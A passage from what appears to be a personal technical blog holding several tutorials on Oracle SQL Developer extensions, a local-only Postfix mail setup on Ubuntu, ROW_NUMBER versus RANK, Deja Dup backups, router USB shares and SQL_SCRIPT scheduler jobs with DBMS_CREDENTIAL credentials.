</items>

Note that we’re using the SQLDeveloper supplied ( and case-sensitive) variables :OBJECT_OWNER and :OBJECT_NAME so that the data returned is for the table that is in context when we open the tab.

If you are familiar with the process of adding User Defined Extensions to SQLDeveloper and want to get your hands on this one, just head over to the Github Repo where I’ve uploaded the relevant file.
You can also find instructions for adding the tab to SQLDeveloper as a user defined extension there.
They are…

Adding a User Defined Extension

In SQLDeveloper select the Tools Menu then Preferences.

Search for User Defined Extensions

Click the Add Row button then click in the Type field and select Editor from the drop-down list

In the Location field, enter the full path to the xml file containing the extension you want to add

Hit OK

Restart SQLDeveloper.
When you select an object of the type for which this extension is defined ( Tables in this example), you will see the new tab has been added

The new tab will work like any other :

Useful Links

The documentation for Extensions has been re-organised in recent years, but here are some links you may find useful :

As you’d expect, Jeff Smith has published a few articles on this topic over the years. Of particular interest are :

The Oracle-Samples GitHub Repo contains lots of example code and some decent instructions.

I’ve also covered this topic once or twice over the years and there are a couple of posts that you may find helpful :

Setting up a Local Only SMTP server in Ubuntu

Tue, 2025-05-06 01:30

If you’re using bash scripts to automate tasks on your Ubuntu desktop but don’t want to have to wade through logs to find out what’s happening, you can setup a Local Only SMTP server and have the scripts mail you their output.
Being Linux, there are several ways to do this.
What follows is how I managed to set this up on my Ubuntu 24_04 desktop (minus all the mistakes and swearing).
Specifically we’ll be looking at :

  • installing Dovecot
  • installing and configuring Postfix
  • installing mailx
  • configuring Thunderbird to handle local emails

As AI appears to be the “blockchain du jour” I thought I should make some attempt to appear up-to-date and relevant. Therefore, various AI entities from Iain M. Banks’ Culture will be making an appearance in what follows…

Software Versions

It’s probably useful to know the versions I’m using for this particular exercise :

  • Ubuntu 24.04.1 LTS
  • Thunderbird 128.10.0esr (64-bit)
  • Postfix 3.8.6
  • Dovecot 2.3.21
  • mailx 8.1.2

If you happen to have any of these installed already, you can check the version of Postfix by running…

postconf mail_version

…Dovecot by running..

dovecot --version

…and mailx by running :

mail -v

The Ubuntu version can be found under Settings/System/About

The Thunderbird version can be found under Help/About.

Before we get to installing or configuring anything, we need to…

Specify a domain for localhost

We need a domain for Postfix. As we’re only flinging traffic around the current machine, it doesn’t have to be known to the wider world, but it does need to point to localhost.

So, in the Terminal :

sudo nano /etc/hosts

…and edit the line for 127.0.0.1 so it includes your chosen domain name.

Conventionally this is something like localhost.com, but “It’s My Party and I’ll Sing If I Want To”…

127.0.0.1 localhost culture.org

Once we’ve saved the file, we can test the new entry by running :

ping -c1 culture.org

PING localhost (127.0.0.1) 56(84) bytes of data.
64 bytes from localhost (127.0.0.1): icmp_seq=1 ttl=64 time=0.062 ms

--- localhost ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.062/0.062/0.062/0.000 ms

Install Dovecot

Simply install the package by running :

sudo apt-get install dovecot-imapd

The installation will complete automatically after which, in this instance, we don’t need to do any configuration at all.

Install and configure Postfix

You can install postfix by running :

sudo apt-get install postfix

As part of the installation you will be presented with a configuration menu screen :

Using the arrow keys, select Local Only then hit Return

In the next screen set the domain name to the one you setup in /etc/hosts ( in my case that’s culture.org ).

Hit Return and the package installation will complete.

Note that if you need to re-run this configuration you can do so by running :

sudo dpkg-reconfigure postfix

Next we need to create a virtual alias map, which we do by running :

sudo nano /etc/postfix/virtual

and populating this new file with two lines that look like :

@localhost <your-os-user>
@domain.name <your-os-user>

In my case the lines in the file are :

@localhost mike
@culture.org mike

Now we need to tell Postfix to read this file so :

sudo nano /etc/postfix/main.cf

…and add this line at the bottom of the file :

virtual_alias_maps = hash:/etc/postfix/virtual

To activate the mapping :

sudo postmap /etc/postfix/virtual

…and restart the postfix service…

sudo systemctl restart postfix

Once that’s done, we can confirm that the postfix service is running :

sudo systemctl status postfix

Installing mailx

As with dovecot, we don’t need to do any more than install the package :

sudo apt-get install bsd-mailx

Testing the Configuration

Now we have mailx, we can test our configuration :

echo "While you were sleeping, I ran your backup for you. Your welcome" | mail -r sleeper.service@culture.org -s "Good Morning" mike@culture.org

To check if we’ve received the email, run :

cat /var/mail/mike

Actually, having to cat the inbox seems like a lot of effort.
If I’m going to be on the receiving end of condescending sarcasm from my own laptop I should at least be able to read it from the comfort of an email client.

Thunderbird

Currently, Thunderbird is the default mail client in Ubuntu and comes pre-installed.

If this is the first time you’ve run Thunderbird, you’ll be prompted to setup an account. If not then you can add an account by going to the “hamburger” menu in Thunderbird and selecting Account Settings. On the following screen click the Account Actions drop-down near the bottom of the screen and select Add Mail Account :

Fill in the details (the password is that of your os account) :

…and click Continue.

Thunderbird will now try and pick an appropriate configuration. After thinking about it for a bit it should come up with something like :

…which needs a bit of tweaking, so click the Configure Manually link and make the following changes :

Incoming Server
  Hostname              : smtp.localhost
  Port                  : 143
  Connection Security   : STARTTLS
  Authentication Method : Normal password
  Username              : your os user (e.g. mike)

Outgoing Server
  Hostname              : smtp.localhost
  Port                  : 25
  Connection Security   : STARTTLS
  Authentication Method : Normal password
  Username              : your os user (e.g. mike)

If you now click the Re-test button, you should get this reassuring message :

If so, then click Done.

You will be prompted to add a security exemption for the Incoming SMTP server

Click Confirm Security Exception

NOTE – you may then get two pop-ups, one after the other, prompting you to sign in via google.com. Just dismiss them. This shouldn’t happen when you access your inbox via Thunderbird after this initial configuration session.

You should now see the inbox you’ve setup, complete with the message sent earlier :

You should also be able to read any mail sent to mike@localhost. To test this :

Incidentally, the first time you send a mail, you’ll get prompted to add a security exception for the Outgoing Mail server. Once again, just hit Confirm Security Exception.
Once you do this, you’ll get a message saying that sending the mail failed. Dismiss it and resend and it will work.
Once again, this is a first-time only issue.

After a few seconds, you’ll see the mail appear in the inbox :

As you’d expect, you can’t send mail to an external email address from this account with this configuration :

Sending an email from a Shell Script

The whole point of this exercise was so I could get emails from a shell script. To test this, I’ve created the following file – called funny_it_worked_last_time.sh

#!/bin/bash  
body=$'Disk Usage : \n'
space=$(df -h)
body+="$space"
body+=$'\nTime to tidy up, you messy organic entity!'
echo "$body" | mail -r me.im.counting@culture.org -s "Status Update" mike@culture.org

If I make this script executable and then run it :

chmod u+x funny_it_worked_last_time.sh

. ./funny_it_worked_last_time.sh

…something should be waiting for me in the inbox…

Further Reading

Part of the reason for writing this was because I couldn’t find one place where the instructions were still applicable on the latest versions of the software I used here.
The links I found most useful were :

Finally, for those of a geeky disposition, here’s a list of Culture space craft.

Fibonacci’s favourite IPL Team and the difference between ROW_NUMBER and RANK Analytic Functions

Mon, 2025-04-07 01:30

This post is really a note-to-self on the differences between the RANK and ROW_NUMBER analytic functions in Oracle SQL and why you don’t need to fiddle about with the order by clause of ROW_NUMBER to persuade it to generate unique values.
Now, I had planned to start by waxing lyrical about the simplicity inherent in that classic of Italian design, the Coffee Moka then segue into a demonstration of how these functions differ using the Fibonacci Sequence.

Despite its name, it turns out that the Fibonacci Sequence isn’t Italian at all, having actually originated in India.
As I’d already come up with the Fibonacci example, I’ll persist with it but, in a “deft and seamless pivot”, I’ll then use the IPL as the basis of further examples.
Full disclosure – the IPL team I follow is Sunrisers Hyderabad, a consequence of having worked with a native of that fair city ( hello Bhargav :)…

ROW_NUMBER vs RANK

As is traditional in posts on this topic, I’ll start by comparing the two functions.

Incidentally, I’ve used a recursive subquery to generate the sequence values ( based on this example ), as I’ll undoubtedly need to lay hands on one the next time I need to use this technique…

with fibonacci( rec_level, last_element, element)
as 
(
    -- Anchor member
    select 
        1 as rec_level,
        0 as last_element,
        1 as element
    from dual
    union all 
    -- Recursive member definition
    select 
        fib.rec_level + 1 as rec_level ,
        fib.element,
        fib.last_element + fib.element as next_element
    from fibonacci fib 
    where fib.rec_level <= 9
)
-- Execute the CTE
select element,
    rank() over( order by element) as rank,
    row_number() over( order by element) as row_number

from fibonacci 
order by rec_level
/

Run this and you get :

   ELEMENT       RANK ROW_NUMBER
---------- ---------- ----------
         1          1          1
         1          1          2
         2          3          3
         3          4          4
         5          5          5
         8          6          6
        13          7          7
        21          8          8
        34          9          9
        55         10         10

10 rows selected. 

In the second row, we can see how the output from each function differs. RANK will return the same value for rows that cannot be separated by the criteria in its order by clause, whereas ROW_NUMBER will always return a unique value for each record.

Some Sensible Examples

We have the following table :

create table ipl_winners 
(
    year number(4) primary key,
    team varchar2(100)
)
/

insert into ipl_winners( year, team)
values( 2008, 'RAJASTHAN ROYALS');

insert into ipl_winners( year, team)
values(2009, 'DECCAN CHARGERS');

insert into ipl_winners( year, team)
values(2010, 'CHENNAI SUPER KINGS');

insert into ipl_winners( year, team)
values(2011, 'CHENNAI SUPER KINGS');

insert into ipl_winners( year, team)
values(2012, 'KOLKATA KNIGHT RIDERS');

insert into ipl_winners( year, team)
values(2013, 'MUMBAI INDIANS');

insert into ipl_winners( year, team)
values(2014, 'KOLKATA KNIGHT RIDERS');

insert into ipl_winners( year, team)
values(2015, 'MUMBAI INDIANS');

insert into ipl_winners( year, team)
values(2016, 'SUNRISERS HYDERABAD');

insert into ipl_winners( year, team)
values(2017, 'MUMBAI INDIANS');

insert into ipl_winners( year, team)
values(2018, 'CHENNAI SUPER KINGS');

insert into ipl_winners( year, team)
values(2019, 'MUMBAI INDIANS');

insert into ipl_winners( year, team)
values(2020, 'MUMBAI INDIANS');

insert into ipl_winners( year, team)
values(2021, 'CHENNAI SUPER KINGS');

insert into ipl_winners( year, team)
values(2022, 'GUJARAT TITANS');

insert into ipl_winners( year, team)
values(2023, 'CHENNAI SUPER KINGS');

insert into ipl_winners( year, team)
values(2024, 'KOLKATA KNIGHT RIDERS');

commit;

If we want to rank IPL Winning Teams by the number of titles won, then RANK() is perfect for the job :

with winners as 
(
    select 
    rank() over ( order by count(*) desc) as ranking,
    team, count(*) as titles
from ipl_winners 
group by team
)
select ranking, team, titles
from winners 
order by ranking, team
/

RANKING TEAM                               TITLES
---------- ------------------------------ ----------
         1 CHENNAI SUPER KINGS                     5
         1 MUMBAI INDIANS                          5
         3 KOLKATA KNIGHT RIDERS                   3
         4 DECCAN CHARGERS                         1
         4 GUJARAT TITANS                          1
         4 RAJASTHAN ROYALS                        1
         4 SUNRISERS HYDERABAD                     1

7 rows selected. 

For a listing of IPL winners ordered by the first year in which they won a title, ROW_NUMBER() is a better fit :

with first_title as 
(
    select team, year, 
        row_number() over ( partition by team order by year) as rn
    from ipl_winners
)
select team, year 
from first_title 
where rn = 1
order by year
/

TEAM                                 YEAR
------------------------------ ----------
RAJASTHAN ROYALS                     2008
DECCAN CHARGERS                      2009
CHENNAI SUPER KINGS                  2010
KOLKATA KNIGHT RIDERS                2012
MUMBAI INDIANS                       2013
SUNRISERS HYDERABAD                  2016
GUJARAT TITANS                       2022

7 rows selected. 

So far, that all seems quite straightforward, but what about…

Deduplicating with ROWID

I have seen ( and, I must confess, perpetrated) examples of RANK() being used for this purpose with ROWID being used as a “tie-breaker” to ensure uniqueness :

with champions as 
(
    select team,  
        rank() over ( partition by team order by team, rowid) as rn
    from ipl_winners
)
select team
from champions 
where rn = 1
/

TEAM
------------------------------
CHENNAI SUPER KINGS
DECCAN CHARGERS
GUJARAT TITANS
KOLKATA KNIGHT RIDERS
MUMBAI INDIANS
RAJASTHAN ROYALS
SUNRISERS HYDERABAD

7 rows selected. 

Whilst, on this occasion, we get the intended result, this query does have some issues.
For one thing, ROWID is not guaranteed to be a unique value, as explained in the documentation :

Usually, a rowid value uniquely identifies a row in the database. However, rows in different tables that are stored together in the same cluster can have the same rowid.

By contrast, ROW_NUMBER requires no such “tie-breaker” criteria and so is rather more reliable in this context :

with champions as 
(
    select team,  
        row_number() over ( partition by team order by team) as rn
    from ipl_winners
)
select team
from champions 
where rn = 1
/

TEAM
------------------------------
CHENNAI SUPER KINGS
DECCAN CHARGERS
GUJARAT TITANS
KOLKATA KNIGHT RIDERS
MUMBAI INDIANS
RAJASTHAN ROYALS
SUNRISERS HYDERABAD

7 rows selected. 

Relative Performance

A simple performance test did not reveal any major difference in the performance of each function.
I tested against a comparatively modest dataset ( 52K rows) on an OCI Free Tier 19c Database.
To mitigate any caching effect, each query was run twice in succession with the second runtime being recorded here.

The test code was :

create table functest as select * from all_objects;

--
-- Test RANK()
--

with obj as 
(
    select owner, object_name,
        rank() over ( partition by owner order by object_name, object_id) as rn
    from functest 
)
select owner, object_name 
from obj 
where rn = 1
order by 1;

--
-- Test ROW_NUMBER()
--

with obj as 
(
    select owner, object_name,
    -- only object_name required in the order by
    row_number() over ( partition by owner order by object_name, object_id) as rn
    from functest 
)
select owner, object_name 
from obj 
where rn = 1
order by 1;

For both test queries the fastest runtime was 0.048 seconds and 43 rows were returned.

Backing Up your Linux Desktop to Google Drive using Deja Dup on Ubuntu

Mon, 2025-02-24 01:30

Let’s face it, ensuring that you have regular backups of your home computer to a remote location can seem like a bit of a chore…right up to the time when you’ve managed to lose your data and need a fast and reliable way to get it back.
If you’re using Ubuntu, this task is made much easier by Deja Dup Backups.
Additionally, the cloud storage that comes free with mail accounts from most of the major tech companies can offer a reliable remote home for your backups until you need them. Handy when you don’t have a spare large-capacity thumb drive kicking around.

Using Ubuntu 24.04.02 LTS, what we’re going to look at here is :

  • Making your Google Drive accessible from the Ubuntu Gnome Desktop
  • Configuring Deja Dup to back up files to the Google Drive
  • Testing the backup
  • Scheduling backups to run regularly

For this purpose we’ll be using Ubuntu’s standard backup tool – Deja Dup ( listed as “Backups” if you need to search for it in the Gnome Application Menu).
We’ll also be making use of a Gmail account other than that used as the main account on an Android phone.
You may be relieved to know that we’ll be able to accomplish all of the above without opening a Terminal window ( well, not much anyway).

Accessing Google Drive from the Gnome Desktop

I’ve chosen to use a gmail account in this example because :

  • Google offers 15GB of free space compared to the 5GB you get with Microsoft or Apple
  • You don’t have to use the Google account you use for your Android phone, so you don’t have to share the space with the phone data backups.

First you need to open Settings – either from the Gnome Application Menu, or from the Panel at the top of the screen – and select Online Accounts :

Now sign in with your Google account…

At this point you’ll be asked to specify what Gnome is allowed to access. In this case I’ve enabled everything :

If you now open Files on your computer, you should see your Google Drive listed :

In this case, I can also see that I have the full 15GB available :

Now we have a remote location to back up to, it’s time to figure out what to back up and how often…

Choosing what to Backup

OK, we’ve got some space, but it’s not unlimited, so we want to take some care to ensure we back up only the files we really need.
By default, the Backup tool will include everything under the current user’s $HOME apart from the Rubbish Bin and the Downloads folder :

Lurking under your $HOME are a number of hidden folders. In the main, these contain useful stuff such as application configuration ( e.g. web browser bookmarks etc). However, there may also be stuff that you really don’t need to keep hold of.

You remember what I said about not having to open a Terminal window ? Well, if you really want to know how big each of these directories is, you can just right-click each one in Files and then look at its properties. Alternatively, if you’re happy to open a Terminal Window, you can run :

du --max-depth=1 --human-readable $HOME |sort -hr

This will output the total size of $HOME followed by the total size of each immediate child directory in descending order :

In this case, I can see that the whole of my home is a mere 80M so I’m not going to worry about excluding anything else from the backup for the moment.
One final point to consider. By default, Deja Dup encrypts backup files using GPG (Gnu Privacy Guard), which will compress files as well as encrypting them. This means that the actual space required for the backup may be considerably less than the current size on disk.

Configuring the Backup

Before we start, we’re going to create a test file so that we can make sure that our backup is working once we’ve configured it.
I’ve created a file in $HOME/Documents...

…which contains…

Now look for “Backups” in the Gnome Application Menu :

Open the tool and click on Create Your First Backup :

Next, we need to select which folders to backup. As mentioned above, Deja Dup uses a reasonably sensible default :

You can add folders to both the Folders to Back Up and Folders to Ignore lists by clicking on the appropriate “+” button and entering either an absolute path, or a relative path from your $HOME.

Next, we need to specify the destination for the backup.
Looks like Deja Dup has been clever enough to detect our mapped Google Drive :

The destination folder name defaults to the name of the current machine.
When the backup runs, the folder will be created automatically if it doesn’t already exist.

When we click the Forward button, Deja Dup may well ask for the installation of additional packages :

…before asking for access to your Google account :

The next screen asks for an Encryption password for your backup. A couple of important points to note here are :

  1. Password protecting the backup is an outstandingly good idea. Whilst this screen does allow you to turn this off, I’d recommend against it – especially if the backup is being stored on a remote server.
  2. Whilst you can ask Deja Dup to remember the password so that you won’t need it if you need to restore files from a backup on the current system, the password is essential if you want to restore the backed up files on another system…or the current system after some major disaster renders your existing settings unavailable. MAKE SURE YOU REMEMBER IT.

When we click Forward, we should now be running our first backup :

Once the backup completes, we’ll have the option to schedule them at regular intervals. First though, let’s take a look at the files that have been created :

Let’s make sure that we can restore files from this backup.
Click on the Restore tab in Deja Dup…

… and you should be able to see all of the files in our backup, including the test file we created earlier :

If we navigate to the Documents folder we can select files to restore :

Click on Restore and select the location to restore to ( in this case, we’ll put it directly into $HOME ) :

Again, click Restore and you’ll get a confirmation that your file is back :

…which we can confirm in Files :

Scheduling Backups

Deja Dup can perform backups automatically at a set interval.
In the Overview tab, select Back Up Automatically.

If you then open the “hamburger” menu and select Preferences, you get additional options, namely :

  • Automated Backup Frequency
  • Keep Backups

Once you’ve configured them, these backups will take place automatically on the schedule you’ve specified.

Accessing USB Storage attached to a Home Router from Ubuntu

Thu, 2025-01-09 01:30

New Year. New Me. Yes, I have made a resolution – set up a drive on my network to share files on.
What I really need for this is a shiny new NAS.
Unfortunately, my abstemious habits at this time of year are less to do with Dry January than they are with “Skint January”.
What I do have however, is a BT Smart Hub 2 Router, which has a usb slot in the back.
I also happen to have a reasonably large capacity thumb drive (128GB) which I found in the back of a drawer.
So, whilst I’m saving my pennies for that all-singing all-dancing NAS, I’m going to attempt to :

  • connect the thumb drive to my Router and share it on the network
  • access the drive as a network share with read-write permissions from my Ubuntu 22.04.5 LTS laptop

That sounds pretty simple, right ? Well, turns out that it is. Mostly…

To begin with, I’ve plugged the thumb drive into the Router, observing Schrödinger’s USB in action – any USB device will only be the right way up on the third try.

I can now see that the device is present in my Router Admin Page.

Now, theoretically at least, we should be able to access the USB from Ubuntu by opening Files ( Nautilus), clicking on Other Locations, and entering the following into the Connect to Server field at the bottom of the screen :

smb://192.168.1.254/usb1/

Unfortunately, we are likely to be met with :

"Failed to mount Windows Share. Software caused connection abort"

It appears that my super modern router uses an older version of Samba than Ubuntu.
Therefore, we need to change the Samba configuration on Ubuntu.
So, open a Terminal and…

sudo vi /etc/samba/smb.conf

There should be a line in this file that says something like :

workgroup = WORKGROUP

Directly below that line, we want to add :

client min protocol = NT1

…and save the file.

Now when we re-open Nautilus and try again, we should be able to see the USB.
You’ll probably be prompted to provide credentials, but just connect as an anonymous user.

Now we’ve established we can connect to the thumb drive, it would be nice to make things a bit more permanent. It would also be useful to ensure that we have read/write privileges on the files on the drive.

Before we do any config, we’ll need to make a note of the uid and gid of our Ubuntu user. By specifying these in the mount command, we can ensure we have full ownership of the files on the thumb drive.

To get these, once again, we need to be in the Terminal.

For the uid (user id) :

id -u

…and for the gid (group id) :

id -g

Now we can proceed with the configuration.

Still in the Terminal, we need to create a directory to serve as a mount point. For example :

sudo mkdir /media/sandisk_nas

Then we need to mount the drive itself. So…

sudo vi /etc/fstab

…and add this line after all the other mounts in the file (in this example, both the uid and gid are 9999) :

//192.168.1.254/usb1 /media/sandisk_nas cifs user,rw,guest,vers=1.0,uid=9999,gid=9999 0 0

We’ve specified “vers=1.0” in the options string to allow for the router running the older Samba version.

After saving the file, we can test by running :

sudo mount /media/sandisk_nas

Now we can see the drive in Nautilus, without having to mount it every time we start up :

The contents of the USB drive displayed in the Files application on Ubuntu

Finally to check that we have read and write permissions :

A Linux terminal window where we cd to the mount point we created and then echo "Cheapskate NAS" to a file called miketest.txt. We then cat the file to verify successful creation

Generating a CSV file with a SQL_SCRIPT Scheduler Job

Tue, 2024-12-03 01:00

Data Warehouse developers don’t ask for much really…a batch window sufficient to run their overnight batch in;
incoming files that conform to their specification; the ability to generate CSV files from a DBMS_SCHEDULER job without writing code that looks like a herd of zebras in a blizzard…

select '"'||emp.first_name||'","'||emp.last_name||'","'||j.job_title||'","'||d.department_name...

These days, there are numerous ways to accomplish this in Oracle, such as

What I’m going to look at here is a third option – using a SQL_SCRIPT scheduler job to take advantage of the formatting options available in SQL*Plus.

So, let’s leave those zebras in peace…

Environment and Setup

As with my previous post on this topic, I’m using a Virtualbox Oracle Developer Day Appliance running 19c database on Oracle Linux 7.6.
We will be running the scheduler job as the HR user.

To recap, the setup is as follows :

On the Server OS
sudo useradd -M hr_etl
sudo passwd hr_etl
On the Database

A credential for the HR_ETL user on the Operating System, which is granted to the HR database user :

begin
    dbms_credential.create_credential
    (
        credential_name => 'HR_ETL_OS_CREDENTIAL',
        username => 'hr_etl',
        password => 'Y3tanothercompl!catedpassword'
    );
end;
/

grant execute on hr_etl_os_credential to hr;

A credential for the HR database user itself :

begin
    dbms_credential.create_credential
    (
        credential_name => 'HR_DB_CREDENTIAL',
        username => 'hr@orcl',
        password => 'Mysupersecrethrpassw0rd!'
    );
end;
/
 
grant execute on hr_db_credential to hr;

Privileges to execute external jobs for the HR user :

grant create job, create external job to hr;
Additional OS Setup

This time, we’re going to need some directories to hold the report file we generate as well as a SQL script. These directories need to be accessible
to the OS user we’re connecting as to run the job ( HR_ETL).
In creating these directories, it would seem prudent to follow the practice of ensuring that HR_ETL ( and ultimately, any DB user with both access to the HR_ETL credential and CREATE DIRECTORY privileges) does not end up with both write and execute access on the same directory.
Therefore, I’ll create the directories under the ownership of a different user and grant access to HR_ETL via the group.
In light of the shenanigans I got up to in the previous post, I’d suggest we don’t use oracle for this purpose. In this example, I’m using “mike”.

First, we’re going to create a group called ETL and assign hr_etl and mike to it :

sudo groupadd etl
sudo usermod -a -G etl hr_etl
sudo usermod -a -G etl mike

Next, we’ll create a directory structure to hold the relevant files :

mkdir /appdata
mkdir /appdata/output
mkdir /appdata/scripts

… and set etl to be the group…

sudo chgrp etl scripts
sudo chgrp etl output

Next, we’ll set the group permissions on the directories, including the setgid bit so that files created in them inherit the etl group; the default permissions themselves will come from the Access Control Lists that we’ll set up in a minute :

chmod g+s scripts
chmod g+s output
sudo chmod g+w output

chmod o-rwx output
chmod o-rwx scripts

The permissions on each directory now look like this :

drwxrws---. 1 mike etl  0 Dec  1 14:37 output
drwxr-s---+ 1 mike etl 48 Dec  1 12:02 scripts

So hr_etl has read and write permissions on OUTPUT and read permissions on SCRIPTS, thanks to its membership of the etl group.

Finally, we want to setup the Access Control Lists for the directories so that any files created in them will have the same permissions as those we’ve specified on the directory ( read write in OUTPUT and read only in SCRIPTS) :

setfacl -d -m g::r-- scripts
setfacl -d -m o::--- scripts
setfacl -d -m g::rw- output
setfacl -d -m o::--- output

To test :

touch /appdata/scripts/zebra.txt
ls -l /appdata/scripts/zebra.txt

-rw-r-----. 1 mike etl 0 Dec  1 14:55 /appdata/scripts/zebra.txt

touch /appdata/output/blizzard.txt
ls -l /appdata/output/blizzard.txt 
-rw-rw-r--. 1 mike etl 0 Dec  1 14:55 /appdata/output/blizzard.txt
File Specification

The file needs to be in standard CSV format ( values enclosed in quotes and separated by commas).
Each record in the file requires a label to specify the type of record it is. The value will be one of :

  • HEADER
  • DATA
  • TRAILER

The TRAILER record needs to be the last line in the file.
It needs to contain a timestamp for when the data was extracted and a count of the DATA rows in the file.

The filename needs to include the current date in it. The file format is :

employees_yyyymmdd.csv
The Report Query

We can fulfill a fair chunk of the file requirements in the report query itself.
To minimise the amount of code that I need to add to the finished job, and so that the query and its output are within easy reach if (when) I need to do some investigation or debugging, I’ve decided to create the report query as a view.

The clouds overhead seem to have miraculously cleared…

create or replace view employees_report_vw
as
    with rpt_data as
    (
        select 
            'DATA' as row_type,
            emp.first_name, 
            emp.last_name, 
            to_char(emp.hire_date, 'YYYY-MM-DD') as hire_date,
            j.job_title,
            d.department_name,
            count(*) over () as record_count -- total number of records returned - same value on every row
        from employees emp
        inner join jobs j
            on emp.job_id = j.job_id
        left outer join departments d
            on emp.department_id = d.department_id
    )
    select 
        row_type as header, -- aliased so that the column heading row in the CSV output reads HEADER
        first_name, 
        last_name, 
        hire_date, 
        job_title, 
        department_name
    from rpt_data
    union
    select 
        'TRAILER', 
        to_char(systimestamp, 'YYYYMMDDHH24MISS'),
        to_char(any_value(record_count)), 
        null, 
        null, 
        null
    from rpt_data
    order by 1 -- ensure the trailer record is output last
/

Querying the view we get :

Dynamically generating the filename

To accomplish this, we’re going to use the SQL*Plus NEW_VALUE column formatting command :

clear screen
column fdate new_value v_date noprint
set verify off
select to_char(sysdate, 'YYYYMMDD') as fdate from dual;

select 'employees_&v_date..csv' from dual;

'EMPLOYEES_20241201.CS
----------------------
employees_20241201.csv
Other SQL*Plus settings

We want to specify that the output is in CSV format, with attributes double-quoted and separated with a comma :

set markup csv on delimiter , quote on

We also want to make sure that the spool off command doesn’t get echoed to the file and that the query result doesn’t clutter up the OUTPUT column in USER_SCHEDULER_JOB_RUN_DETAILS :

set echo off
set termout off

There’s a bit of a snag here : the echo and termout settings only take effect when the statements are run from a script, rather than entered interactively. Therefore, I’m going to save the finished script to a file and copy it to the scripts directory we created on the server earlier.
The finished article is called employees_report_job.sql and looks like this :

column fdate new_value v_date noprint
set verify off
select to_char( sysdate, 'YYYYMMDD') as fdate from dual;

set feedback off
set echo off
set termout off
set markup csv on delimiter , quote on
spool /appdata/output/employees_&v_date..csv
select * from employees_report_vw;
spool off
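
Incidentally, if you want a quick preview of the CSV markup output before copying the script to the server, you can run the relevant settings interactively and spool to a local file ( /tmp used here purely as an example path ) :

set markup csv on delimiter , quote on
set feedback off
spool /tmp/employees_preview.csv
select * from employees_report_vw where rownum <= 5;
spool off
-- put things back the way we found them
set markup csv off
set feedback on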

The SQL_SCRIPT job

After all that, we can now set up and run the job from the comfort of the database…

set define off
declare
    v_job_name varchar2(30) := 'EMPLOYEES_REPORT_JOB';
begin
    dbms_scheduler.create_job
    (
        job_name => v_job_name,
        job_type => 'SQL_SCRIPT',
        job_action => '@/appdata/scripts/employees_report_job.sql',
        credential_name => 'mike.hr_etl_os_credential',
        enabled => false
    );
    
    dbms_scheduler.set_attribute
    ( 
        name => v_job_name, 
        attribute => 'connect_credential_name',
        value => 'mike.hr_db_credential'
    );
    
    dbms_scheduler.enable(v_job_name);
end;
/

After running this we can check the job status :

select status, output
from user_scheduler_job_run_details
where job_name = 'EMPLOYEES_REPORT_JOB';

If we now check on the server, we can see that the file has been created in the output directory…

ls -l /appdata/output/employees_20241201.csv 
rw-rw-rw-. 1 hr_etl etl 7226 Dec  1 16:11  /appdata/output/employees_20241201.csv

Checking the file itself …

head /appdata/output/employees_20241201.csv 

"HEADER","FIRST_NAME","LAST_NAME","HIRE_DATE","JOB_TITLE","DEPARTMENT_NAME"
"DATA","Adam","Fripp","1997-04-10","Stock Manager","Shipping"
"DATA","Alana","Walsh","1998-04-24","Shipping Clerk","Shipping"
"DATA","Alberto","Errazuriz","1997-03-10","Sales Manager","Sales"
"DATA","Alexander","Hunold","1990-01-03","Programmer","IT"
"DATA","Alexander","Khoo","1995-05-18","Purchasing Clerk","Purchasing"
"DATA","Alexis","Bull","1997-02-20","Shipping Clerk","Shipping"
"DATA","Allan","McEwen","1996-08-01","Sales Representative","Sales"
"DATA","Alyssa","Hutton","1997-03-19","Sales Representative","Sales"

…and…

tail /appdata/output/employees_20241201.csv 

"DATA","TJ","Olson","1999-04-10","Stock Clerk","Shipping"
"DATA","Tayler","Fox","1998-01-24","Sales Representative","Sales"
"DATA","Timothy","Gates","1998-07-11","Shipping Clerk","Shipping"
"DATA","Trenna","Rajs","1995-10-17","Stock Clerk","Shipping"
"DATA","Valli","Pataballa","1998-02-05","Programmer","IT"
"DATA","Vance","Jones","1999-03-17","Shipping Clerk","Shipping"
"DATA","William","Gietz","1994-06-07","Public Accountant","Accounting"
"DATA","William","Smith","1999-02-23","Sales Representative","Sales"
"DATA","Winston","Taylor","1998-01-24","Shipping Clerk","Shipping"
"TRAILER","20241201161121","107",,,

That should keep everyone happy, including the zebras.

Setting up a Credential for use in SQL_SCRIPT jobs without using the Oracle os user

Mon, 2024-11-18 01:30

In a recent post, Connor McDonald showed how to setup and use the SQL_SCRIPT scheduler job type to run SQL*Plus directly from the database.
Connor’s example enabled this functionality for a specific individual ( SCOTT) who already knew the Oracle OS account’s password and was therefore able to create a credential based on that user.
But what if we want to incorporate scheduler executed SQL*Plus scripts into an application, rather than just making it available to an individual ?

Tweaking Connor’s example, I’m going to attempt to :

  • grant permissions on a credential to another user
  • use the connect_credential_name job attribute to avoid hard-coding passwords
  • explore the potential problem with using the oracle OS user as the object of a credential
  • set up a Linux account to base the credential on instead

The environment I’m using is an Oracle Developer Day VM running Oracle Enterprise Edition 19c on Oracle Linux 7.6.

Granting privileges on DBMS_CREDENTIAL credentials

Yes, Credentials are database objects, and as such are grantable. So, as a user with the CREATE CREDENTIAL privilege …

begin
    dbms_credential.create_credential
    (
        credential_name => 'ORACLE_OS_CREDENTIAL',
        username => 'oracle',
        password => 'ThisisownlyknowntotheDBAhon3st!'
    );
end;
/

grant execute on oracle_os_credential to hr;

We can also use a credential to connect to the database whilst in a SQL_SCRIPT job.
In this case, we need to include the database connect string in the username :

begin
    dbms_credential.create_credential
    (
        credential_name => 'HR_DB_CREDENTIAL',
        username => 'hr@orcl',
        password => 'Mysupersecrethrpassw0rd!'
    );
end;
/

grant execute on hr_db_credential to hr;

If the application we’re dealing with involves lots of batch jobs and file wrangling, the application owner schema may already have the required privileges. If not, then we would need to grant them :

grant create job, create external job to hr;

If we now connect as HR, we can see the credentials…

select owner, credential_name, username, enabled
from all_credentials
/

OWNER           CREDENTIAL_NAME                USERNAME        ENABLED
--------------- ------------------------------ --------------- -----------
MIKE            ORACLE_OS_CREDENTIAL           oracle          TRUE
MIKE            HR_DB_CREDENTIAL               hr@orcl         TRUE

…as well as the privileges…

select privilege
from user_sys_privs
where privilege like '%JOB%';

PRIVILEGE                               
----------------------------------------
CREATE EXTERNAL JOB
CREATE JOB

Now HR can run a job to test the setup…

declare
    v_job_name varchar2(128) := 'HR_TEST_JOB1';
    v_script varchar2(32767);
begin
    -- SQL*Plus statements included, but no connect string
    v_script := q'[
        column os_user format a20
